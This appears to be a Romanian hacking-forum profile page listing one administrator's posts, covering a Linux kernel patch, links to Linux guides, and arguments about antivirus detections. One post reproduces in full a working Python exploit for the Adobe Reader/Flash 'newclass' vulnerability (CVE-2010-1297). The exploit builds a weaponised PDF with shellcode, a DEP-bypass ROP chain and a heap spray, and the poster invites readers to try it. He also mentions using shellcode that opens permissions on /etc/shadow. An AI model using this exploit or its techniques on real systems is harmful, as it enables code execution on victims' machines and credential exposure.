Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18725

  • Joined

  • Last visited

  • Days Won

    706

 Content Type 

Everything posted by Nytro

  1. Nytro

    Problema php

    Nytro replied to jigsy18's topic in Cosul de gunoi

    Nu e problema HTML, e problema PHP. Probabil a fost uitata o paranteza e inchidere, sau poate niste ghilimele sau punctul si virgula.
  2. Nytro
    Am incercat sa imi compilez si eu un kernel ca tot omul, si am vazut ca mai apar unele erori la compilare. Si de ce sa nu incerc sa le rezolv, daca tot nu e greu? Si am cautat in fisierul cu pricina, era vorba de un switch() pe o variabila care era de tipul enum v4l2_mbus_pixelcode. Acel switch avea un "case 0:" iar tipul enum v4l2_mbus_pixelcode nu continea aceasta valoare, asta fiind cauza avertismentului la compilare. In prima instanta am modificat header-ul care definea acea structura, dar am vorbit cu maintainer-ul in cauza si am decis ca e mai bine sa scot acel "case 0" deoarece este inutil. Cu alte cuvinte, patch-ul (un fel de "Hello world" al patch-urilor, dar totusi un patch) inseamna de fapt 3 linii scoase din fisierul "/drivers/media/video/mt9v022.c". Dar e si asta util, pe langa faptul ca nu veti mai primi eroare la compilare, am scapat si de 3 linii de cod inutile. Deci kernelu vostru ca fi mai mic si mai rapid Screenshot cu mail-ul trimis: http://i55.tinypic.com/345k77p.png Am ascuns mail-ul meu, deoarece nu am trimis de pe nytro_rst@yahoo.com, ci de pe un alt mail pe care il folosesc mai frecvent. Patch-ul: --- a/drivers/media/video/mt9v022.c 2010-08-27 02:47:12.000000000 +0300 +++ b/drivers/media/video/mt9v022.c 2010-09-01 16:12:00.704505851 +0300 @@ -402,9 +402,6 @@ if (mt9v022->model != V4L2_IDENT_MT9V022IX7ATC) return -EINVAL; break; - case 0: - /* No format change, only geometry */ - break; default: return -EINVAL; } Stiu ca nu e cine stie ce, dar cred ca e un inceput bun. Oricum, am mai trimis 2 patch-uri (insa doar 1 e trimis corect), dar nu am primit raspuns. PS: Patch-ul nu a fost inca vazut si aprobat de Linus, dar nu vad de ce nu ar face-o. Am incercat sa ma fac util
  3. Nytro

    Conturi

    Nytro replied to gamer's topic in Off-topic

    Doar un alt topic de 2 lei...
  4. Nytro
    Linux System Administrators Guide Pagini: 107 Screenshot: http://i52.tinypic.com/291cak4.png Download: http://www.speedyshare.com/files/24094090/sag-0.6.2.pdf http://www.mediafire.com/?ag9dds7dc6a473o
  5. Nytro
    Linux Network Administrators Guide Pagini: 489 Screenshot: http://i51.tinypic.com/14tx2d5.png Download: http://www.speedyshare.com/files/24094067/nag2.pdf http://www.mediafire.com/?f662nms0wn57c30
  6. Nytro
    Linux Programmers Guide Pagini: 131 Screenshot: http://i55.tinypic.com/nwwti8.png Download: http://www.speedyshare.com/files/24094052/lpg-0.4.pdf http://www.mediafire.com/?8un2zndvvby1abi
  7. Nytro
    Linux Kernel 2.4 Internals Pagini: 55 Screenshot: http://i56.tinypic.com/2qnnqio.png Download: http://www.speedyshare.com/files/24094027/lki.pdf http://www.mediafire.com/?dqu2dzgbdv1ivjm
  8. Nytro
    Am gasit-o prin /usr/share/doc/Books/ Prezinta mai multe distributii de Linux, si e destul de stufoasa (300+ pagini). Problema ar fi ca e scrisa in 1998, dar cred ca e foarte utila. Download: http://www.speedyshare.com/files/24093998/install-guide-3.2.pdf http://www.mediafire.com/?qo3333d7513ifty
  9. Nytro

    Dau la schimb

    Nytro replied to jigsy18's topic in Off-topic

    M-am cam plictisit sa vad trade-uri de 2 lei pe aici...
  10. Nytro
    Pai spune ca banuiesti ca e un flase positive, nu zice ca "moama, il detecteaza 8 antivirusi" si atat. Si cui ceri explicatie? Lui Slick? El a facut antivirusii aia? Cere-le alora. Se pot trimite mailuri pentru false positive, dar nu sta nimeni sa trimita, nu are rost, nu ii pasa lui Slick ca se trezesc unii ca e programul detectabil.
  11. Nytro
    Amice, tocmai ai zis ca programul asta e un virus. Vino in plm cu dovezi, analizeaza-l, nu cu un scan de 2 lei. Si tocmai de asta nu sunt in afara subiectului, ti-am dat exemplu, sa inteleaga si tampu de tine, ca nu e un virus, si ca de multe ori antivirusii gasesc fisiere inocente ca "virusi". Ce vrei, sa posteze sursa, sa o hexeze toti ratatii? Nu ca unul ca tine ar sti ce sa faca cu o sursa, dar na, trebuie sa iti explic. Daca mai vrei sa zici ceva dai PM.
  12. Nytro
    Alt destept... Yahoo! Manager, tampenia aia a mea, era detectata de o gramada de antivirusi. Si ai sursa acolo, te uiti in ea, si vezi ca nu face nimic. Si uita-te si tu ca ce anume e detectat. Nu, gata, scan, e virus...
  13. Nytro

    Sql injection

    Nytro replied to zoondark's topic in Off-topic

    Nu citi pseudo-tutoriale ca cel scris de totti, nu o sa intelegi nimic. Nici nu ai ce intelege... Adica nu e nici o explicatie. E "fa aia", "scrie aia", dar nici un "Scri aia CA SA...". Sau "Asta face CA..." Lasa tutorialele astea, invata mai intai SQL (MySQL recomand, deoarece pentru asta gasesti cele mai multe articole si carti). Apoi poti citi "tutoriale".
  14. Nytro
    Unique vulnerability verifying technique reduces false positives New faster scanning engine reduces time to scan a website by up to 300% Acunetix 7 reduces time needed to fix security vulnerabilities Detect more web vulnerabilities Scan a wider range of web applications HTTP authentication Easily create your own vulnerability checks Cred ca face mai putine request-uri, asta e foarte bine. Acunetix 7 makes web application security checking easier and more cost effective | Acunetix Web Application Security Blog
  15. Nytro

    Conturi

    Nytro replied to a topic in Off-topic

    Nu ma intereseaza primul post, am inchis deoarece replicile sunt de kkt.
  16. Nytro

    Conturi

    Nytro replied to a topic in Off-topic

    Topic jegos, topic inchis.
  17. Nytro
    Voi nu aveti nici o pasiune? Stati toata ziua in casa si nu faceti nimic? Omul face ce ii place... Poate vi se pare putin ciudat, si mie mi se pare, dar e chiar interesant. Bine, eu nu as face asa ceva
  18. Nytro
    Probabil kernelul trebuie sa fie compilat cu anumite optiuni...
  19. Nytro
    Programul nu e vechi de 5 ani, eram ironic. In primul rand, ca totul sa se desfasoare ca la care, ar trebui sa analizeze fiecare program inainte de a posta. Tu ai sta o ora, doua sa analizezi un fisier inainte sa il postezi? Si cu virustotal s-a tot explicat, daca e ceva nedetectabil si scanezi acolo, e trimis la echipele de antivirusi care il verifica si astfel devine detectabil. M-am plictisit de astfel de discutii...
  20. Nytro
    Nu tot ce e detectat e "rau". E un RAT, e normal sa fie foarte detectat la 5 ani de la aparitie. Ce ti se pare asa suspect in scanarea de pe Anubis?
  21. Nytro
    Nicolae Guta & Play AJ - Sunt tare
  22. Nytro
    Si mie imi mai zicea ca e fisierul corupt, dar ca il repara. Voua v-a aparut asa ceva? Edit: Detalii: http://www.exploit-db.com/download_pdf/14863 A incercat si fratimio pe Windows 7 si nu a mers
  23. Nytro
    MOAUB #1 - Adobe Acrobat Reader and Flash Player "newclass" invalid pointer ''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < Day 1 (Binary Analysis) | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/adobe-acrobat-newclass-invalid-pointer-vulnerability/ http://www.exploit-db.com/sploits/moaub1-adobe-newclass.tar.gz Title : Adobe Acrobat Reader and Flash Player “newclass” invalid pointer vulnerability Analysis : http://www.abysssec.com Vendor : http://www.adobe.com Impact : Ciritical Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-1297 MOAUB Number : MOAUB-01-BA ''' import sys class PDF: def __init__(self): self.xrefs = [] self.eol = '\x0a' self.content = '' self.xrefs_offset = 0 def header(self): self.content += '%PDF-1.6' + self.eol def obj(self, obj_num, data,flag): self.xrefs.append(len(self.content)) self.content += '%d 0 obj' % obj_num if flag == 1: self.content += self.eol + '<< ' + data + ' >>' + self.eol else: self.content += self.eol + data + self.eol self.content += 'endobj' + self.eol def obj_SWFStream(self, obj_num, data, stream): self.xrefs.append(len(self.content)) self.content += '%d 0 obj' % obj_num self.content += self.eol + '<< ' + data + '/Params << /Size %d >> /DL %d /Length %d' %(len(stream),len(stream),len(stream)) self.content += ' >>' + self.eol self.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol self.content += 'endobj' + self.eol def obj_Stream(self, obj_num, data, stream): self.xrefs.append(len(self.content)) self.content += '%d 0 obj' % obj_num self.content += self.eol + '<< ' + data + '/Length %d' %len(stream) self.content += ' >>' + self.eol self.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol self.content += 'endobj' + self.eol def ref(self, ref_num): return '%d 0 R' % ref_num def xref(self): self.xrefs_offset = len(self.content) self.content += 'xref' + self.eol self.content += '0 %d' % (len(self.xrefs) + 1) self.content += self.eol self.content += '0000000000 65535 f' + self.eol for i in self.xrefs: self.content += '%010d 00000 n' % i self.content += self.eol def trailer(self): self.content += 'trailer' + self.eol self.content += '<< /Size %d' % (len(self.xrefs) + 1) self.content += ' /Root ' + self.ref(1) + ' >> ' + self.eol self.content += 'startxref' + self.eol self.content += '%d' % self.xrefs_offset self.content += self.eol self.content += '%%EOF' def generate(self): return self.content class Exploit: def convert_to_utf16(self, payload): enc_payload = '' for i in range(0, len(payload), 2): num = 0 for j in range(0, 2): num += (ord(payload[i + j]) & 0xff) << (j * 8) enc_payload += '%%u%04x' % num return enc_payload def get_payload(self): # shellcode calc.exe payload =("\x90\x90\x90\x89\xE5\xD9\xEE\xD9\x75\xF4\x5E\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" "\x43\x43\x43\x43\x43\x43\x37\x51\x5A\x6A\x41\x58\x50\x30\x41\x30\x41\x6B\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41" "\x42\x58\x50\x38\x41\x42\x75\x4A\x49\x4B\x4C\x4B\x58\x51\x54\x43\x30\x43\x30\x45\x50\x4C\x4B\x51\x55\x47\x4C\x4C\x4B\x43\x4C" "\x43\x35\x44\x38\x45\x51\x4A\x4F\x4C\x4B\x50\x4F\x44\x58\x4C\x4B\x51\x4F\x47\x50\x45\x51\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C" "\x4B\x43\x31\x4A\x4E\x46\x51\x49\x50\x4A\x39\x4E\x4C\x4C\x44\x49\x50\x42\x54\x45\x57\x49\x51\x48\x4A\x44\x4D\x45\x51\x49\x52" "\x4A\x4B\x4B\x44\x47\x4B\x46\x34\x46\x44\x45\x54\x43\x45\x4A\x45\x4C\x4B\x51\x4F\x47\x54\x43\x31\x4A\x4B\x43\x56\x4C\x4B\x44" "\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C\x4C\x4B\x43\x31\x4A\x4B\x4C\x49\x51\x4C\x47\x54\x45\x54" "\x48\x43\x51\x4F\x46\x51\x4C\x36\x43\x50\x46\x36\x45\x34\x4C\x4B\x50\x46\x50\x30\x4C\x4B\x47\x30\x44\x4C\x4C\x4B\x44\x30\x45" "\x4C\x4E\x4D\x4C\x4B\x42\x48\x44\x48\x4D\x59\x4B\x48\x4B\x33\x49\x50\x43\x5A\x46\x30\x45\x38\x4C\x30\x4C\x4A\x45\x54\x51\x4F" "\x42\x48\x4D\x48\x4B\x4E\x4D\x5A\x44\x4E\x50\x57\x4B\x4F\x4A\x47\x43\x53\x47\x4A\x51\x4C\x50\x57\x51\x59\x50\x4E\x50\x44\x50" "\x4F\x46\x37\x50\x53\x51\x4C\x43\x43\x42\x59\x44\x33\x43\x44\x43\x55\x42\x4D\x50\x33\x50\x32\x51\x4C\x42\x43\x45\x31\x42\x4C" "\x42\x43\x46\x4E\x45\x35\x44\x38\x42\x45\x43\x30\x41\x41") return payload def getSWF(self): try: #swfFile = sys.argv[2] fdR = open('flash.swf', 'rb+') strTotal = fdR.read() str1 = strTotal[:88] addr1 = '\x06\xa6\x17\x30' # addr = 0c0c0c0c str2 = strTotal[92:533] #*************************** Bypass DEP by VirtualProtect ******************************** rop = '' rop += "\x77\xFA\x44\x7E" # mov edi,esp ret 4 rop += "\x94\x28\xc2\x77" #add esp,20 pop ebp ret rop += "AAAA" #padding rop += "\xD4\x1A\x80\x7C" # VirtualProtect rop += "BBBB" # Ret Addr for VirtualProtect rop += "CCCC" # Param1 (lpAddress) rop += "DDDD" # Param2 (Size) rop += "EEEE" # Param3 (flNewProtect) rop += "\x10\xB0\xEF\x77" # Param4 (Writable Address) rop += "AAAAAAAAAAAA" #padding rop += "\xC2\x4D\xC3\x77" #mov eax,edi pop esi ret rop += "AAAA" #padding rop += "\xF2\xE1\x12\x06" #add eax,94 ret rop += "\x70\xDC\xEE\x77" #push esp pop ebp ret4 rop += "\x16\x9A\x94\x7C" #mov [ebp-30],eax ret rop += "AAAA" #padding rop += "\xC2\x4D\xC3\x77" #mov eax,edi pop esi ret rop += "AAAA" #padding rop += "\xF2\xE1\x12\x06" #add eax,94 ret rop += "\x79\x9E\x83\x7C" #mov [ebp-2c],eax ret rop += "\x27\x56\xEA\x77" #mov eax,6b3 ret rop += "\x14\x83\xE0\x77" #mov [ebp-28],eax ret rop += "\xB4\x01\xF2\x77" #xor eax,eax ret rop += "\x88\x41\x97\x7C" #add eax,40 pop ebp ret rop += "AAAA" #padding rop += "\x70\xDC\xEE\x77" #push esp pop ebp ret4 rop += "\xC0\x9E\xEF\x77" #mov [ebp-54],eax ret rop += "AAAA" #padding rop += "\xC2\x4D\xC3\x77" #mov eax,edi pop esi ret rop += "AAAA" #padding rop += "\xC1\xF2\xC1\x77" #add eax,8 ret rop += "\xCF\x97\xDE\x77" #xchg eax,esp ret str3 = strTotal[669:1249] alignESP = "\x83\xc4\x03" sc = self.get_payload() if len(sc) > 2118: print "[*] Error : payload length is long" return if len(sc) <= 2118: dif = 2118 - len(sc) while dif > 0 : sc += '\x90' dif = dif - 1 str4 = strTotal[3370:3726] addr2 = '\xF2\x3D\x8D\x23' # Enter 0C75 , 81 RET str5 = strTotal[3730:] fdW= open('exploit.swf', 'wb+') finalStr = str1+addr1+str2+rop+str3+alignESP+sc+str4+addr2+str5 fdW.write(finalStr) #strTotal = open('exploit.swf', 'rb+').read() fdW.close() fdR.close() return finalStr except IOError: print '[*] Error : An IO error has occurred' def HeapSpray(self): spray = ''' function spray_heap() { var chunk_size, payload, nopsled; chunk_size = 0x1A0000; pointers = unescape("??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????"); pointerSled = unescape("<Contents>"); while (pointerSled.length < chunk_size) pointerSled += pointerSled; pointerSled_len = chunk_size - (pointers.length + 20); pointerSled = pointerSled.substring(0, pointerSled_len); heap_chunks = new Array(); for (var i = 0 ; i < <CHUNKS> ; i++) heap_chunks[i] = pointerSled + pointers; } spray_heap(); ''' spray = spray.replace('<Contents>', '??') # Pointer to XCHG ESP , EBX ''' Authplay.dll 303033DD ? 87DC XCHG ESP,EBX ############################################################# will do nothing 303033DF ? 45 INC EBP 303033E0 ? 05 00898784 ADD EAX,84878900 303033E5 ? 42 INC EDX 303033E6 ? 05 008987E8 ADD EAX,E8878900 303033EB ? 41 INC ECX 303033EC ? 05 008987EC ADD EAX,EC878900 303033F1 ? 41 INC ECX 303033F2 ? 05 008987F0 ADD EAX,F0878900 303033F7 ? 41 INC ECX 303033F8 ? 05 008987F4 ADD EAX,F4878900 303033FD ? 41 INC ECX 303033FE ? 05 005F5E5D ADD EAX,5D5E5F00 30303403 . B8 01000000 MOV EAX,1 30303408 . 5B POP EBX ############################################################ 30303409 . 83C4 30 ADD ESP,30 3030340C . C3 RETN ''' spray = spray.replace('<CHUNKS>', '40') #Chunk count return spray def generate_pdf(): exploit = Exploit() swfFile = 'exploit.swf' pdf = PDF() pdf.header() pdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) + ' /OpenAction ' + pdf.ref(17),1) #pdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) ,1) pdf.obj(2, '/Count 1/Type/Pages/Kids[ '+pdf.ref(3)+' ]',1) pdf.obj(3, '/Annots [ '+pdf.ref(5) +' ]/Parent '+pdf.ref(2) + " /Type/Page"+' /Contents '+pdf.ref(4) ,1) pdf.obj_Stream(4, '','') pdf.obj(5, '/RichMediaSettings '+pdf.ref(6)+' /NM ( ' + swfFile + ' ) /Subtype /RichMedia /Type /Annot /RichMediaContent '+pdf.ref(7)+' /Rect [ 266 116 430 204 ]',1) pdf.obj(6, '/Subtype /Flash /Activation '+pdf.ref(8)+' /Type /RichMediaSettings /Deactivation '+pdf.ref(9),1) pdf.obj(7, '/Type /RichMediaContent /Assets '+pdf.ref(10) +' /Configurations [ ' + pdf.ref(11) + ']',1) pdf.obj(8, '/Type /RichMediaActivation /Condition /PO ',1) pdf.obj(9, '/Type /RichMediaDeactivation /Condition /XD ',1) pdf.obj(10, '/Names [('+ swfFile +') ' + pdf.ref(12)+' ]',1) pdf.obj(11, '/Subtype /Flash /Type /RichMediaConfiguration /Name (ElFlash) /Instances [ '+pdf.ref(13) +' ]',1) pdf.obj(12, '/EF <</F '+pdf.ref(14) +' >> /Type /Filespec /F ('+ swfFile +')',1) pdf.obj(13, '/Subype /Flash /Params '+pdf.ref(15) +' /Type /RichMediaInstance /Asset '+ pdf.ref(12) ,1) pdf.obj_SWFStream(14, ' /Type /EmbeddedFile ',exploit.getSWF() ) pdf.obj(15, '/Binding /Background /Type /RichMediaParams /FlashVars () /Settings '+pdf.ref(16),1) pdf.obj_Stream(16, '<</Length 0 >> ','') pdf.obj(17, '/Type /Action /S /JavaScript /JS (%s)' % exploit.HeapSpray(),1) pdf.xref() pdf.trailer() return pdf.generate() def main(): if len(sys.argv) != 2: print 'Usage: python %s [output file name]' % sys.argv[0] sys.exit(0) file_name = sys.argv[1] if not file_name.endswith('.pdf'): file_name = file_name + '.pdf' try: fd = open(file_name, 'wb+') fd.write(generate_pdf()) fd.close() print '[-] PDF file generated and written to %s' % file_name except IOError: print '[*] Error : An IO error has occurred' print '[-] Exiting ...' sys.exit(-1) if __name__ == '__main__': main() Sursa: MOAUB #1 - Adobe Acrobat Reader and Flash Player ?newclass? invalid pointer Eu l-am incercat pe Linux, dar nu a mers. Bine, am schimbat shellcode-ul intr-unul pentru Linux, am incercat si cu "reboot" si cu "kill all processes" si cu "chmod 0666 si 0777 /etc/shadow" si nu a mers. nytro@rst:~> uname -r 2.6.34-12-default Astept sa il incerce cineva pe Windows. Luati si voi asta: http://www.exploit-db.com/sploits/moaub1-adobe-newclass.tar.gz Sa postati aici ce ati reusit Edit: Detalii http://www.exploit-db.com/download_pdf/14863
  24. Nytro
    svchost vine de la SerViCe HOST. Adica se ocupa de serviciile care ruleaza, astea fiind tot niste procese.
  25. Nytro
    Stealer-ele sunt niste prostii. Sunt multi care le folosesc, dar pentru ce anume? Nici ei nu stiu. Ia o gramada de conturi si ce fac cu ele? Nimic. In nici un caz nu as fi de acord cu asa ceva. In primul rand nu as fi de acord din punct de vedere etic, e furt informational, adica furt. Si mai ziceti de aia care fura in strainatate, pai si astia ce plm fac? Apoi, mi se pare foarte stupid, foarte "script kiddie" si nu orice script kidding ci unul complet inutil. Deci, porcarie.
×
×
  • Create New...